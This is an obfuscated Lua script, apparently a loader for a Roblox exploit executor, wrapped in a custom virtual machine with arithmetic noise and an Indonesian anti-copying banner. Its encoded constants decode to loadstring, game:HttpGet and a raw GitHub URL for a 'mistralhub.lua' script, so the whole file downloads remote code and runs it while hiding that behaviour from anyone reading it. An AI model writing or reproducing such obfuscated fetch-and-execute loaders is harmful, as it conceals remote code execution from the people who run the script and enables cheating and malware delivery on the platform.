--[[
         ʷʰᵉʳᵉ              ʷʰᵉʳᵉ               ʷʰᵉʳᵉ
  
    ʷʰᵉʳᵉ            ʷʰᵉʳᵉ                ʷʰᵉʳᵉ                ʷʰᵉʳᵉ       ʷʰᵉʳᵉ  
   
█        ʷʰᵉʳᵉ          ʷʰᵉʳᵉ              Jangan skid ya dek         ʷʰᵉʳᵉ     
                                 ʷʰᵉʳᵉ 
                                                      ʷʰᵉʳᵉ                ʷʰᵉʳᵉ
]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v90=v5(v83,v19);v19=nil;return v90;else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -3)^(v32-(1 + 0))))%(((1070 -(68 + 997)) -3)^(((v33-1) -(v32-((1271 -(226 + 1044)) -0))) + ((8 -6) -1))) ;return v84-(v84%(620 -((672 -(32 + 85)) + 64))) ;else local v85=(933 -(840 + 17 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 -0) ;end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==((1756 -799) -((1242 -(87 + 263)) + 65))) then v35=v1(v16,v18,v18);v18=v18 + (181 -(67 + 113)) ;v34=2 -1 ;end if (v34==(1 -0)) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;return (v37 * 256) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;return (v41 * ((120956573 -54275742) -49903615)) + (v40 * (66488 -(802 + 150))) + (v39 * (689 -433)) + v38 ;end local function v24() local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 + 0)) then if (v47==(997 -(915 + 82))) then if (v46==((859 -(814 + 45)) -0)) then return v48 * (0 + 0) ;else local v100=0 -(0 -0) ;while true do if (v100==0) then v47=1188 -(1069 + 118) ;v45=0 -0 ;break;end end end elseif (v47==(4477 -2430)) then return ((v46==(0 + 0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1015 + 8) ) * (v45 + (v46/((793 -(368 + 423))^(163 -111)))) ;end if (v42==(19 -(10 + 8))) then v45=3 -(1 + 1) ;v46=(v20(v44,443 -(416 + 26) ,63 -43 ) * ((1 + 1)^(56 -24))) + v43 ;v42=440 -(145 + 293) ;end if (v42==(432 -(44 + 386))) then v47=v20(v44,1507 -(998 + (1373 -(261 + 624))) ,10 + 21 );v48=((v20(v44,27 + 5 )==(773 -(201 + (1014 -443)))) and  -(1139 -(116 + 1022))) or (4 -(1083 -(1020 + 60))) ;v42=2 + 1 ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=3 -2 ;end end end local function v25(v49) local v50;if  not v49 then local v86=1423 -(630 + 793) ;while true do if (v86==(0 -0)) then v49=v23();if (v49==((1747 -(760 + 987)) -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v66=(1916 -(1789 + 124)) -2 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 0 + 0 ;end)();while true do if (v68~=(1822 -(301 + 1521))) then else if (v52~=(8 -5)) then else for v101= #" ",v23() do local v102=(function() return v21();end)();if (v20(v102, #"]", #"}")~=(0 + 0)) then else local v133=(function() return 0 -0 ;end)();local v134=(function() return;end)();local v135=(function() return;end)();local v136=(function() return;end)();while true do if (v133==(3 + 0)) then if (v20(v135, #"nil", #"91(")== #"~") then v136[ #"0836"]=(function() return v59[v136[ #".dev"]];end)();end v54[v101]=(function() return v136;end)();break;end if (v133==2) then if (v20(v135, #",", #":")~= #"}") then else v136[2 -0 ]=(function() return v59[v136[5 -3 ]];end)();end if (v20(v135,2,1702 -(1419 + 281) )~= #">") then else v136[ #"asd"]=(function() return v59[v136[ #"xxx"]];end)();end v133=(function() return 3;end)();end if (v133~=(1 -0)) then else local v156=(function() return 74 -(71 + 3) ;end)();while true do if (v156~=(1 + 0)) then else v133=(function() return 4 -2 ;end)();break;end if (v156==(700 -(271 + 429))) then v136=(function() return {v22(),v22(),nil,nil};end)();if (v134==(0 + 0)) then local v169=(function() return 1500 -(1408 + 92) ;end)();while true do if (v169~=0) then else v136[ #"gha"]=(function() return v22();end)();v136[ #"http"]=(function() return v22();end)();break;end end elseif (v134== #"<") then v136[ #"nil"]=(function() return v23();end)();elseif (v134==(243 -(187 + 54))) then v136[ #"19("]=(function() return v23() -(2^(796 -(162 + 618))) ;end)();elseif (v134~= #"91(") then else local v176=(function() return 0 + 0 ;end)();local v177=(function() return;end)();while true do if (v176==(0 + 0)) then v177=(function() return 1288 -(993 + 295) ;end)();while true do if (v177~=(0 + 0)) then else v136[ #"19("]=(function() return v23() -((3 -1)^(1187 -(418 + 753))) ;end)();v136[ #"0836"]=(function() return v22();end)();break;end end break;end end end v156=(function() return 1 + 0 ;end)();end end end if (v133~=0) then else local v157=(function() return 0 -0 ;end)();local v158=(function() return;end)();while true do if (v157==(0 + 0)) then v158=(function() return 1636 -(1373 + 263) ;end)();while true do if (v158~=(1000 -(451 + 549))) then else local v170=(function() return 0;end)();while true do if (v170~=(530 -(406 + 123))) then else v158=(function() return 1 + 0 ;end)();break;end if (v170~=(0 -0)) then else v134=(function() return v20(v102,2 -0 , #"nil");end)();v135=(function() return v20(v102, #"asd1",3 + 3 );end)();v170=(function() return 1;end)();end end end if (v158~=(1385 -(746 + 638))) then else v133=(function() return 1;end)();break;end end break;end end end end end end for v103= #"~",v23() do v55,v103,v28=(function() return v53(v55,v103,v28);end)();end return v57;end if (v52~=(1 + 0)) then else local v95=(function() return 0;end)();local v96=(function() return;end)();while true do if (v95~=(0 -0)) then else v96=(function() return 0 -0 ;end)();while true do if (v96==(0 -0)) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v96=(function() return 342 -(218 + 123) ;end)();end if (v96==1) then v58=(function() return v23();end)();v52=(function() return 2;end)();break;end end break;end end end v68=(function() return 1 + 0 ;end)();end if (v68==1) then if (v52~=2) then else local v97=(function() return 0;end)();while true do if (v97~=(2 -1)) then else v57[ #"xnx"]=(function() return v21();end)();v52=(function() return 3;end)();break;end if (v97==(0 -0)) then v59=(function() return {};end)();for v144= #"\\",v58 do local v145=(function() return 114 -(4 + 110) ;end)();local v146=(function() return;end)();local v147=(function() return;end)();local v148=(function() return;end)();while true do if (v145~=(1582 -(1535 + 46))) then else v148=(function() return nil;end)();while true do if (v146~=(0 + 0)) then else local v167=(function() return 0 + 0 ;end)();while true do if (v167==(561 -(306 + 254))) then v146=(function() return 1 + 0 ;end)();break;end if (v167==0) then v147=(function() return v21();end)();v148=(function() return nil;end)();v167=(function() return 1;end)();end end end if ((104 -(17 + 86))~=v146) then else if (v147== #"|") then v148=(function() return v21()~=0 ;end)();elseif (v147==(2 + 0)) then v148=(function() return v24();end)();elseif (v147== #"91(") then v148=(function() return v25();end)();end v59[v144]=(function() return v148;end)();break;end end break;end if (v145==(0 -0)) then v146=(function() return 0;end)();v147=(function() return nil;end)();v145=(function() return 1 -0 ;end)();end end end v97=(function() return 1;end)();end end end if (v52==(1467 -(899 + 568))) then local v98=(function() return 0 + 0 ;end)();local v99=(function() return;end)();while true do if (v98==0) then v99=(function() return 0 -0 ;end)();while true do if ((604 -(268 + 335))~=v99) then else v55=(function() return {};end)();v52=(function() return 291 -(60 + 230) ;end)();break;end if (0==v99) then v53=(function() return function(v162,v163,v164) local v165=(function() return 0 + 0 ;end)();local v166=(function() return;end)();while true do if (v165~=(572 -(426 + 146))) then else v166=(function() return 0 + 0 ;end)();while true do if (v166~=(65 -(30 + 35))) then else v162[v163-#":" ]=(function() return v164();end)();return v162,v163,v164;end end break;end end end;end)();v54=(function() return {};end)();v99=(function() return 1457 -(282 + 1174) ;end)();end end break;end end end break;end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[1259 -(149 + 894 + 214) ];local v65=v60[11 -(11 -3) ];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=1213 -(323 + 889) ;local v74= -(2 -1);local v75={};local v76={...};local v77=v12("#",...) -(581 -(361 + 219)) ;local v78={};local v79={};for v87=320 -(53 + 267) ,v77 do if ((3286<=4935) and (v87>=v71)) then v75[v87-v71 ]=v76[v87 + 1 + 0 ];else v79[v87]=v76[v87 + ((750 -(144 + 192)) -((231 -(42 + 174)) + 299 + 99)) ];end end local v80=(v77-v71) + (983 -(18 + 964)) ;local v81;local v82;while true do v81=v69[v73];v82=v81[3 -2 ];if (v82<=(2 + 0 + 1)) then if (v82<=(1 + 0)) then if (v82>(850 -(20 + 830))) then do return;end else local v104;local v105,v106;local v107;local v108;v79[v81[2 + 0 ]]=v62[v81[3]];v73=v73 + (127 -(116 + 10)) ;v81=v69[v73];v79[v81[1 + 1 ]]=v62[v81[1 + 2 ]];v73=v73 + (739 -(542 + (1700 -(363 + 1141)))) ;v81=v69[v73];v108=v81[3 -1 ];v107=v79[v81[(1581 -(1183 + 397)) + 2 ]];v79[v108 + 1 + (0 -0) ]=v107;v79[v108]=v107[v81[4]];v73=v73 + 1 + 0 ;v81=v69[v73];v79[v81[4 -2 ]]=v81[7 -4 ];v73=v73 + (1552 -(1126 + 425)) ;v81=v69[v73];v79[v81[2]]=v81[(300 + 108) -(118 + 215 + 72) ]~=0 ;v73=v73 + 1 ;v81=v69[v73];v108=v81[7 -5 ];v105,v106=v72(v79[v108](v13(v79,v108 + (1122 -(118 + 1003)) ,v81[8 -5 ])));v74=(v106 + v108) -(378 -(142 + 235)) ;v104=0 -0 ;for v138=v108,v74 do v104=v104 + 1 + 0 ;v79[v138]=v105[v104];end v73=v73 + (978 -((2528 -(1913 + 62)) + 424)) ;v81=v69[v73];v108=v81[3 -1 ];v79[v108]=v79[v108](v13(v79,v108 + 1 + 0 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2 + 0 ]]();v73=v73 + 1 + 0 ;v81=v69[v73];do return;end end elseif (v82==2) then v79[v81[1 + 1 ]]();else local v123=v81[2];v79[v123]=v79[v123](v13(v79,v123 + 1 + 0 + 0 ,v74));end elseif ((788<=3423) and (v82<=(10 -5))) then if (v82==(11 -7)) then v79[v81[4 -2 ]]=v81[1 + 2 ];else v79[v81[9 -7 ]]=v62[v81[756 -(239 + 514) ]];end elseif ((v82<=6) or (4007<741)) then local v129=v81[1 + 1 ];local v130,v131=v72(v79[v129](v13(v79,v129 + ((3520 -2190) -(797 + 532)) ,v81[3 + (1933 -(565 + 1368)) ])));v74=(v131 + v129) -1 ;local v132=0 + 0 ;for v141=v129,v74 do v132=v132 + (3 -2) ;v79[v141]=v130[v132];end elseif (v82==(16 -9)) then local v149=v81[2];local v150=v79[v81[1205 -(373 + 829) ]];v79[v149 + (732 -((2137 -(1477 + 184)) + 255)) ]=v150;v79[v149]=v150[v81[1134 -(369 + (1036 -275)) ]];else v79[v81[2 + 0 ]]=v81[5 -2 ]~=(0 -0) ;end v73=v73 + (239 -(60 + 4 + 174)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403523Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B616E646171792F736372697074626F742F726566732F68656164732F6D61696E2F6D69737472616C6875622E6C756100093Q00124Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000400016Q000100049Q0000026Q000100016Q00017Q00",v9(),...);
